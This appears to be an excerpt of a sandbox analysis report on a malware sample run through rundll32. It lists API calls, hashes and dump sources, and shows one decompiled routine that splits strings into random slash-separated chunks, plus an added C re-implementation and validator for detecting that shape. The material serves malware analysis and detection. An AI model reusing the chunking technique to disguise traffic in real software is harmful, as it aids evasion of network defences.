                                          • Instruction ID: ad3eea281d0a92316cbd50b15456e0abd16390aaa70f92d5db7aa3bebd3b22d1
                                          • Opcode Fuzzy Hash: 239c6fb493e21f5c35ce8812290f3a86b44d53910bca08d30330bc2aa5dbd2ed
                                          • Instruction Fuzzy Hash: 0E214A31500209EAEF21DFA5DD44EEE7BF8FF48355F140165F929A22A1EB74C94ACB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(0614C2D0), ref: 00B72423
                                          • RtlLeaveCriticalSection.NTDLL(0614C2D0), ref: 00B7243E
                                          • GetLastError.KERNEL32 ref: 00B724AC
                                          • GetLastError.KERNEL32 ref: 00B724BB
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalErrorLastSection$EnterLeave
                                          • String ID:
                                          • API String ID: 2124651672-0
                                          • Opcode ID: 7395462d7115225acc7d16514dde916dc932129b90fd1c16bbe03011a4568f84
                                          • Instruction ID: 0807c51570cb14c74bbdadef76fdca89ee209bda0959660f12d30a6246b4619a
                                          • Opcode Fuzzy Hash: 7395462d7115225acc7d16514dde916dc932129b90fd1c16bbe03011a4568f84
                                          • Instruction Fuzzy Hash: 47215C36500609EFCB11DFA8DC44A9EBBF8FF08711F118155FA29A3290CB34DA55DB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00B53AEB: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,00B6A192), ref: 00B53B11
                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00001003,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00B6A1CD
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,00B5A61B,?), ref: 00B6A1DF
                                          • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,00B5A61B,?), ref: 00B6A1F7
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,00B5A61B,?), ref: 00B6A212
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseCreateHandleModuleNamePointerRead
                                          • String ID:
                                          • API String ID: 1352878660-0
                                          • Opcode ID: e2387d6f4ff9f2ddf6766fe8790f140e1b28ac1534822a041d0722acfcf5f175
                                          • Instruction ID: b8d2eb8c79aa4c426992e9aa36e211d223be74e3104c79403b3729c9189d3a39
                                          • Opcode Fuzzy Hash: e2387d6f4ff9f2ddf6766fe8790f140e1b28ac1534822a041d0722acfcf5f175
                                          • Instruction Fuzzy Hash: DF117C71681118BADF20AFA59C89EAF7EADEF05751F104091FA15F20A1D7318E44CAA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlen.KERNEL32(?,?,?,?,00B51765), ref: 00B650FD
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • lstrcpy.KERNEL32(00000000,?), ref: 00B65114
                                          • StrChrA.SHLWAPI(00000000,0000002E,?,?,00B51765), ref: 00B6511D
                                          • GetModuleHandleA.KERNEL32(00000000,?,?,00B51765), ref: 00B6513B
                                            • Part of subcall function 00B67DF1: VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,00000000,00000000,?,00000000,00B51765,00000000,00000004,?,00000000,?), ref: 00B67EC9
                                            • Part of subcall function 00B67DF1: VirtualProtect.KERNEL32(?,00000004,?,?,00000000,00B51765,00000000,00000004,?,00000000,?,00000000,?,00B750A8,0000001C,00B6E844), ref: 00B67EE4
                                            • Part of subcall function 00B67DF1: RtlEnterCriticalSection.NTDLL(00B79420), ref: 00B67F09
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ProtectVirtual$AllocateCriticalEnterHandleHeapModuleSectionlstrcpylstrlen
                                          • String ID:
                                          • API String ID: 105881616-0
                                          • Opcode ID: 2c38e34b2eb24348595791917670a6bfd0cadfb12aa5f9e6ca6b36e0483f5dfa
                                          • Instruction ID: e4ee97ff04d68681dd963ed1b44962e8921a9e1ea225343a52943646a6c74f78
                                          • Opcode Fuzzy Hash: 2c38e34b2eb24348595791917670a6bfd0cadfb12aa5f9e6ca6b36e0483f5dfa
                                          • Instruction Fuzzy Hash: F5216274900709EFCB21DF68C848BAEBBF8EF46304F1480A9E505E7250DB78D985DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlenW.KERNEL32(?), ref: 00B5415B
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001), ref: 00B5417D
                                          • lstrcpyW.KERNEL32(00000000,?), ref: 00B541A9
                                          • lstrcatW.KERNEL32(00000000,?), ref: 00B541BC
                                            • Part of subcall function 00B56C62: strstr.NTDLL ref: 00B56D3A
                                            • Part of subcall function 00B56C62: strstr.NTDLL ref: 00B56D8D
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: strstr$AllocateByteCharHeapMultiWidelstrcatlstrcpylstrlen
                                          • String ID:
                                          • API String ID: 3712611166-0
                                          • Opcode ID: 1bf4897213608e2c060bdd2fc200b017952210e2df621c333506f6411e43c10a
                                          • Instruction ID: b311b47ac35c40d58fe992422fca743c7a9fd23355abfd3fefe44efaaf9e82c3
                                          • Opcode Fuzzy Hash: 1bf4897213608e2c060bdd2fc200b017952210e2df621c333506f6411e43c10a
                                          • Instruction Fuzzy Hash: 75117976100119BFDB11AFA4CC88DDF7FADEF1939AB0040A5F909A7120DB31DE958BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00B557A3
                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B557C7
                                          • RegCloseKey.ADVAPI32(?), ref: 00B5581F
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?), ref: 00B557F0
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: QueryValue$AllocateCloseHeapOpen
                                          • String ID:
                                          • API String ID: 453107315-0
                                          • Opcode ID: 0121e5b996e216106bb18d31724408470361d03fa1aac5835d9cde85c434aeb7
                                          • Instruction ID: 82132a716d480a5a13557d316376859e5eb490652d1b3c0a53d85593b093c617
                                          • Opcode Fuzzy Hash: 0121e5b996e216106bb18d31724408470361d03fa1aac5835d9cde85c434aeb7
                                          • Instruction Fuzzy Hash: 2E2106B580050CFFCB119F98C8849EEBFF9EB88342F2084A6F805A7210D7319A84DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E048972E7(unsigned int __eax, void* __ecx) {
                                          				// Copies the NUL-terminated string in EAX into a fresh heap buffer,
                                          				// cutting it into pseudo-random chunks of 8..23 bytes separated by '/'.
                                          				// Chunk lengths come from the LCG below, so the result looks like a
                                          				// path made of randomly sized segments.
                                          				void* _v8;
                                          				void* _v12;
                                          				char* _t13;
                                          				signed int _t21;
                                          				signed short _t23;
                                          				char* _t27;
                                          				void* _t29;
                                          				void* _t30;
                                          				unsigned int _t33;
                                          				void* _t37;
                                          				unsigned int _t38;
                                          				void* _t41;
                                          				void* _t42;
                                          				int _t45;
                                          				void* _t46;
                                          
                                          				_t42 = __eax;                                   // source string
                                          				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx); // lstrlen(__eax); see APIs, ref 048972F2. Only the first argument is real, the rest is register noise from the decompiler.
                                          				_t38 = __eax;                                   // bytes of input still to copy
                                          				// Output buffer: len + len/8 + 1. Every chunk is at least 8 bytes and costs
                                          				// one '/', so len/8 bounds the number of separators; +1 is the NUL.
                                          				_t30 = RtlAllocateHeap( *0x489a2d8, 0, (__eax >> 3) + __eax + 1); // *0x489a2d8: the module's heap handle
                                          				_v12 = _t30;
                                          				if(_t30 != 0) {
                                          					_v8 = _t42;                                 // read cursor into the source
                                          					do {
                                          						_t33 = 0x18;                            // cap a chunk at 24 bytes ...
                                          						if(_t38 <= _t33) {
                                          							_t33 = _t38;                        // ... or at whatever is left
                                          						}
                                          						// LCG step on the global seed at 0x489a2f0: seed = seed * 0x19660D + 0x3C6EF35F.
                                          						// The decompiler types the result as 16-bit because only the low word is consumed below.
                                          						_t21 =  *0x489a2f0; // 0xd5abf0c
                                          						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                          						 *0x489a2f0 = _t23;
                                          						// chunk = 8 + (low16(seed) % (cap - 8)), i.e. 8 .. cap-1 bytes, always leaving
                                          						// at least one byte for the next round. The body runs once before the loop
                                          						// test, so an 8-byte input gives a zero divisor and a shorter one wraps the
                                          						// modulus; callers evidently pass strings longer than 8 bytes.
                                          						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                          						memcpy(_t30, _v8, _t45);
                                          						_v8 = _v8 + _t45;
                                          						_t27 = _t30 + _t45;
                                          						_t38 = _t38 - _t45;
                                          						_t46 = _t46 + 0xc;                      // ESP += 12 after the cdecl memcpy; decompiler artifact, not program state
                                          						 *_t27 = 0x2f;                           // '/' separator
                                          						_t13 = _t27 + 1; // 0x1
                                          						_t30 = _t13;                            // write cursor past the '/'
                                          					} while (_t38 > 8);
                                          					memcpy(_t30, _v8, _t38 + 1);                // tail of 1..8 bytes plus the NUL terminator
                                          				}
                                          				return _v12;
                                          			}

                                          Statement addresses (the decompilation's side column, one entry per statement of E048972E7, 0x048972ef .. 0x0489737e):
                                          0x048972ef 0x048972f2 0x048972f8 0x04897310 0x04897312 0x04897317 0x04897319
                                          0x0489731c 0x0489731e 0x04897321 0x04897323 0x04897323 0x04897325 0x04897330
                                          0x04897335 0x04897346 0x0489734e 0x04897353 0x04897356 0x04897359 0x0489735b
                                          0x0489735e 0x04897361 0x04897361 0x04897364 0x0489736f 0x04897374 0x0489737e

                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,048937CC,00000000,?,?,0489653D,?,052495B0), ref: 048972F2
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0489730A
                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,048937CC,00000000,?,?,0489653D,?,052495B0), ref: 0489734E
                                          • memcpy.NTDLL(00000001,?,00000001), ref: 0489736F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpy$AllocateHeaplstrlen
                                          • String ID:
                                          • API String ID: 1819133394-0
                                          • Opcode ID: 51185830ca85d99f60aebc3b96cca051ec6b5e4dfc5cf65f8e83641bbe5ea235
                                          • Instruction ID: 269e76342e29ee236f89ba96f0639916666cf84ea7ce768d8cf2d5fb48248003
                                          • Opcode Fuzzy Hash: 51185830ca85d99f60aebc3b96cca051ec6b5e4dfc5cf65f8e83641bbe5ea235
                                          • Instruction Fuzzy Hash: 92110A72A00514AFD7148FA9DC85D9E7BEAEBC4350B090675F504D7240EB759E009790
                                          Uniqueness

                                          Uniqueness Score: -1.00%
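A portable re-implementation of the routine decompiled above as E048972E7, added here as an example; it is not code from the sample or from the Joe Sandbox report. The LCG step (seed * 0x19660D + 0x3C6EF35F), the 8..23 byte chunk rule with its 24-byte cap, and the len + len/8 + 1 buffer are taken from the decompilation; the function names `slash_split`, `lcg_step` and `looks_slash_split`, the 40-byte input string, and the decision to keep the seed as a full 32-bit value (the decompiler typed the intermediate as 16-bit, but only the low word is consumed) are this example's assumptions. It also differs from the sample in one deliberate way: inputs of 8 bytes or fewer are copied unchanged instead of reaching the zero divisor the decompiled loop would hit. The validator at the end checks the shape the generator produces, which is the property a path-matching check would test.

```c
/*
 * Example re-implementation of E048972E7 (chunk a string, join with '/').
 * Not the sample's code: constants and the chunk rule follow the decompilation,
 * the 32-bit seed and the <= 8 byte guard are assumptions of this example.
 */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* One LCG step, as in the decompiled loop: seed = seed * 0x19660D + 0x3C6EF35F (mod 2^32). */
static uint32_t lcg_step(uint32_t *seed)
{
    *seed = *seed * 0x19660DU + 0x3C6EF35FU;
    return *seed;
}

/*
 * Split src into pseudo-random chunks of 8..23 bytes separated by '/'.
 * The final chunk is 1..8 bytes. Returns a malloc'd string (caller frees),
 * or NULL on allocation failure. Inputs of 8 bytes or fewer are returned
 * unchanged; the decompiled code has no such guard (assumption of this example).
 */
char *slash_split(const char *src, uint32_t *seed)
{
    size_t len = strlen(src);
    /* Every chunk is >= 8 bytes and costs one '/', so len/8 bounds the separators. */
    char *out = malloc(len + (len >> 3) + 1);
    if (out == NULL)
        return NULL;
    if (len <= 8) {
        memcpy(out, src, len + 1);
        return out;
    }

    const char *rd = src;       /* read cursor */
    char *wr = out;             /* write cursor */
    size_t remaining = len;
    do {
        size_t cap = remaining < 24 ? remaining : 24;   /* min(remaining, 0x18) */
        uint16_t r = (uint16_t)lcg_step(seed);         /* low 16 bits of the new seed */
        size_t chunk = 8 + r % (cap - 8);              /* 8 .. cap-1, never the whole remainder */
        memcpy(wr, rd, chunk);
        rd += chunk;
        wr += chunk;
        remaining -= chunk;
        *wr++ = '/';
    } while (remaining > 8);
    memcpy(wr, rd, remaining + 1);                     /* tail (1..8 bytes) plus NUL */
    return out;
}

/* Convenience wrapper: split with a given starting seed value. */
char *slash_split_seeded(const char *src, uint32_t seed)
{
    return slash_split(src, &seed);
}

/*
 * Check that joined has the shape slash_split produces from src: stripping the
 * '/' separators yields src, every segment but the last is 8..23 bytes, and the
 * last is 1..8 bytes. src itself must not contain '/'. Returns 1 if it matches.
 */
int looks_slash_split(const char *joined, const char *src)
{
    size_t seg = 0, si = 0;
    for (const char *p = joined; ; p++) {
        if (*p == '/' || *p == '\0') {
            int last = (*p == '\0');
            if (last ? (seg < 1 || seg > 8) : (seg < 8 || seg > 23))
                return 0;
            if (last)
                break;
            seg = 0;
            continue;
        }
        if (src[si] == '\0' || src[si] != *p)
            return 0;
        si++;
        seg++;
    }
    return src[si] == '\0';
}

int main(void)
{
    /* Constructed 40-byte input; seed 0 for a reproducible run. The dump shows the
       sample's seed as 0x0d5abf0c at the time of the snapshot; any value works here. */
    uint32_t seed = 0;
    const char *s = "0123456789abcdefghijklmnopqrstuvwxyzABCD";
    char *split = slash_split(s, &seed);
    printf("%s\n", split ? split : "(alloc failed)");
    free(split);
    return 0;
}
```

With seed 0 the first LCG output is 0x3C6EF35F; its low word 0xF35F mod 16 is 15, so the first chunk is 23 bytes, and the second step (0x47502932, low word 10546, mod 9 = 7) gives a 15-byte chunk, leaving a 2-byte tail: `0123456789abcdefghijklm/nopqrstuvwxyzAB/CD`. Because the seed is global in the sample, two consecutive calls there produce different splits of the same input; the wrapper here resets it per call so results are reproducible.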

                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00B5A27D,00000000,?,?,00B5ACCC,00000000,0614C310), ref: 00B657A3
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B657BB
                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,00B5A27D,00000000,?,?,00B5ACCC,00000000,0614C310), ref: 00B657FF
                                          • memcpy.NTDLL(00000001,?,00000001,?,?,?), ref: 00B65820
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: memcpy$AllocateHeaplstrlen
                                          • String ID:
                                          • API String ID: 1819133394-0
                                          • Opcode ID: 0c94fd77c856105e94ba89d765724dd5a72b61df7b0af2834f3c96ce21aa3a36
                                          • Instruction ID: e378bfd9d94902aa7f989d8a921f967e130a64acad43dbb1a7db79be793c8dc0
                                          • Opcode Fuzzy Hash: 0c94fd77c856105e94ba89d765724dd5a72b61df7b0af2834f3c96ce21aa3a36
                                          • Instruction Fuzzy Hash: 74112972A00214BFC7108BA9DC88D9EBBEEDBC1361B0402B6F509D7150EB749E00D7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GlobalFix.KERNEL32(00000000), ref: 00B5F214
                                          • memset.NTDLL ref: 00B5F228
                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 00B5F235
                                            • Part of subcall function 00B6D818: OpenProcess.KERNEL32(00000410,?,?,?,00000000,?,0000001C,00000000,00000000,?,?,?,00B5E219,?), ref: 00B6D872
                                            • Part of subcall function 00B6D818: CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104,?,00000000,?,0000001C,00000000,00000000,?,?,?,00B5E219,?), ref: 00B6D890
                                            • Part of subcall function 00B6D818: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00B6D8F8
                                          • GlobalUnWire.KERNEL32(00000000), ref: 00B5F260
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: GlobalProcessTime$CloseFileHandleOpenSystemThreadWindowWirememset
                                          • String ID:
                                          • API String ID: 3286078456-0
                                          • Opcode ID: fce7cef2339faf4ea76724490af8707723a892c6bf831405e9173dec807b298f
                                          • Instruction ID: ecfb3c3dcb32f7d4ddb27d93a3e0fe783b6cada3100a44ac0fc9ba9a05873cc3
                                          • Opcode Fuzzy Hash: fce7cef2339faf4ea76724490af8707723a892c6bf831405e9173dec807b298f
                                          • Instruction Fuzzy Hash: 46119175A40205ABD720ABB4AC4DBAEBBB8EF58711F0040A9F905E3280EF7089458B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000001,?,?,?,00B55F93,00000000,00000000), ref: 00B69667
                                          • GetLastError.KERNEL32(?,?,?,00B55F93,00000000,00000000,00000000,00000000,0000001E,0000001E,?,?,?,00B52605,?,0000001E), ref: 00B6966F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharErrorLastMultiWide
                                          • String ID:
                                          • API String ID: 203985260-0
                                          • Opcode ID: 7ccadbaf60a0096da8606e4afaa94709b06f86c18cd083d8da14cc0ccf5e4181
                                          • Instruction ID: 1ef4f7accd9aca5d72a31f428f0612b7177db2d3977e0e159daa7366e231df59
                                          • Opcode Fuzzy Hash: 7ccadbaf60a0096da8606e4afaa94709b06f86c18cd083d8da14cc0ccf5e4181
                                          • Instruction Fuzzy Hash: A701D472108350BF8320AA669C48C2BBFECEBCA771B110A59F96697280DB348814CA70
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlen.KERNEL32(?), ref: 00B52942
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • mbstowcs.NTDLL ref: 00B5295C
                                          • lstrlen.KERNEL32(?), ref: 00B52967
                                          • mbstowcs.NTDLL ref: 00B52981
                                            • Part of subcall function 00B55A14: lstrlenW.KERNEL32(?,00000000,76D869A0,?,00000250,?,00000000), ref: 00B55A60
                                            • Part of subcall function 00B55A14: lstrlenW.KERNEL32(?,?,00000000), ref: 00B55A6C
                                            • Part of subcall function 00B55A14: memset.NTDLL ref: 00B55AB4
                                            • Part of subcall function 00B55A14: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00B55ACF
                                            • Part of subcall function 00B55A14: lstrlenW.KERNEL32(0000002C), ref: 00B55B07
                                            • Part of subcall function 00B55A14: lstrlenW.KERNEL32(?), ref: 00B55B0F
                                            • Part of subcall function 00B55A14: memset.NTDLL ref: 00B55B32
                                            • Part of subcall function 00B55A14: wcscpy.NTDLL ref: 00B55B44
                                            • Part of subcall function 00B5C6B8: RtlFreeHeap.NTDLL(00000000,00000000,00B71A9A,00000000), ref: 00B5C6C4
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrlen$Heapmbstowcsmemset$AllocateFileFindFirstFreewcscpy
                                          • String ID:
                                          • API String ID: 1961997177-0
                                          • Opcode ID: 894c294f0e188d1b9f78ab5d436afd15049709bf80df34f88e789875556f59b7
                                          • Instruction ID: 874ac96c4f9e6316c19a594224c1678a4c825db2c5fb062b19d54cf3a58d5311
                                          • Opcode Fuzzy Hash: 894c294f0e188d1b9f78ab5d436afd15049709bf80df34f88e789875556f59b7
                                          • Instruction Fuzzy Hash: A201B532500304B7CB116BA98C46F9FBFEDDF85756F1444A6FA05A7102EB75DA0497A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00B70641,?,00000000,00000000), ref: 00B600B9
                                          • lstrlen.KERNEL32(0614C178,?,00B70641,?,00000000,00000000), ref: 00B600DA
                                          • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 00B600F2
                                          • lstrcpy.KERNEL32(00000000,0614C178), ref: 00B60104
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
                                          • String ID:
                                          • API String ID: 1929783139-0
                                          • Opcode ID: 15862f000a43b9ec385038d45481e733b826c933b93286663e97bbcc36efd9d2
                                          • Instruction ID: 75a3cca20b0d2319d3ddcfc767324a48184ed088b1f6dcc784c2ddd1900cbda0
                                          • Opcode Fuzzy Hash: 15862f000a43b9ec385038d45481e733b826c933b93286663e97bbcc36efd9d2
                                          • Instruction Fuzzy Hash: 39019B76904248FFC711ABA9AC84B5F7BFCEB59301F1440A5FE0AE3241DB349945C760
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlen.KERNEL32(?), ref: 00B51227
                                          • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 00B5124D
                                          • lstrcpy.KERNEL32(00000014,?), ref: 00B51272
                                          • memcpy.NTDLL(?,?,?), ref: 00B5127F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeaplstrcpylstrlenmemcpy
                                          • String ID:
                                          • API String ID: 1388643974-0
                                          • Opcode ID: f348b2c172d167030c38664d90e8fa3dacb8ee2d61361c5af900025f0d652b43
                                          • Instruction ID: 1d93acbfd317cd24e48ebbfc77942d7efaa42748a989a20fa9a0a91a357bf451
                                          • Opcode Fuzzy Hash: f348b2c172d167030c38664d90e8fa3dacb8ee2d61361c5af900025f0d652b43
                                          • Instruction Fuzzy Hash: CE11497190020AEFCB21CF58D884A9ABBF8EB48715F10845AF94AD7220C771E944CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlen.KERNEL32(?,748FD3B0,?,76D85520,00B522AF,00000000,?,?,?), ref: 00B5970D
                                          • RtlAllocateHeap.NTDLL(00000000,0000000D), ref: 00B59725
                                          • memcpy.NTDLL(0000000C,?,00000001), ref: 00B5973B
                                            • Part of subcall function 00B652C3: StrChrA.SHLWAPI(?,?,748FD3B0,0614C304,00000000,?,00B5CE0C,?,00000020,0614C304), ref: 00B652E8
                                            • Part of subcall function 00B652C3: StrTrimA.SHLWAPI(?,00B74FC4,00000000,?,00B5CE0C,?,00000020,0614C304), ref: 00B65307
                                            • Part of subcall function 00B652C3: StrChrA.SHLWAPI(?,?,?,00B5CE0C,?,00000020,0614C304), ref: 00B65313
                                          • HeapFree.KERNEL32(00000000,00000000,0000000C,00000020,00000000), ref: 00B5976D
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateFreeTrimlstrlenmemcpy
                                          • String ID:
                                          • API String ID: 3208927540-0
                                          • Opcode ID: 170289b720147d8344340d3a8818e36481dee4d212a8a0c87c7441303cc6102f
                                          • Instruction ID: 99b57c957de41dfc2a37299b58750a10c9d2208d9514e136c757d3eb982e04f4
                                          • Opcode Fuzzy Hash: 170289b720147d8344340d3a8818e36481dee4d212a8a0c87c7441303cc6102f
                                          • Instruction Fuzzy Hash: D401D432610701EBE7211F25ECC4F277BE8EB88712F1044A6FA0ED6191CFA08C499760
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • RtlInitializeCriticalSection.NTDLL(00B79420), ref: 00B6179B
                                          • RtlInitializeCriticalSection.NTDLL(00B79400), ref: 00B617B1
                                          • GetVersion.KERNEL32(?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B617C2
                                          • GetModuleHandleA.KERNEL32(00001663,?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B617F6
                                            • Part of subcall function 00B6C203: GetModuleHandleA.KERNEL32(?,00000001,77D49EB0,00000000,?,?,?,?,00000000,00B617D9), ref: 00B6C21B
                                            • Part of subcall function 00B6C203: LoadLibraryA.KERNEL32(?), ref: 00B6C2BC
                                            • Part of subcall function 00B6C203: FreeLibrary.KERNEL32(00000000), ref: 00B6C2C7
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalHandleInitializeLibraryModuleSection$AllocateFreeHeapLoadVersion
                                          • String ID:
                                          • API String ID: 1711133254-0
                                          • Opcode ID: 0fa79c14940f8ecbf7f4089cc9aaee95727282ac1f016bded095bcf226c3f1c7
                                          • Instruction ID: f9f7b6975b5488a3105b13b13c113abc1a4b8b15b3259a5fdde897762a50e911
                                          • Opcode Fuzzy Hash: 0fa79c14940f8ecbf7f4089cc9aaee95727282ac1f016bded095bcf226c3f1c7
                                          • Instruction Fuzzy Hash: EF11ADB2A41201AFDB109FAEAC89A157BF4FB48321B4148BAE50DD7360CF744C81CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(00B79448), ref: 00B5338E
                                          • Sleep.KERNEL32(0000000A), ref: 00B53398
                                          • SetEvent.KERNEL32 ref: 00B533EF
